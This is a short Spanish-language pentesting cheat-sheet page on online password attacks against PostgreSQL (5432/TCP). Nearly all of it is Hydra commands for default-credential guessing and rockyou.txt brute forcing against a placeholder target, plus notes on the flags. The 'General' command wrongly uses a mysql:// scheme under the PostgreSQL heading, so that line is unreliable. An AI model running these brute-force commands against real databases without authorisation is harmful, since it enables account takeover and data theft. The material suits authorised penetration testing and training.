> For the complete documentation index, see [llms.txt](https://pentesting.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.mrw0l05zyn.cl/explotacion/ataques-de-contrasenas/en-linea-online/5432-tcp-postgresql.md).

# 5432/TCP (PostgreSQL)

## Hydra

```shell
# General
hydra -L <path-users> -P <path-passwords> mysql://<target>:<port> -V -f
# Credenciales por defecto
hydra -l postgres -P /usr/share/seclists/Passwords/Default-Credentials/default-passwords.txt postgres://<target>:<port> -V -f
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Default-Credentials/default-passwords.txt postgres://<target>:<port> -V -f
# Fuerza bruta
hydra -l postgres -P /usr/share/wordlists/rockyou.txt postgres://<target>:<port> -V -f
```

* -L = utilizar archivo de usuarios.
  * \<path-users> = ruta de archivo con listado de usuarios.
* -P = utilizar archivo de contraseñas.
  * \<path-passwords> = ruta de archivo con listado de contraseñas.
* \<target> = objetivo.
* \<port> = puerto del servicio PostgreSQL.
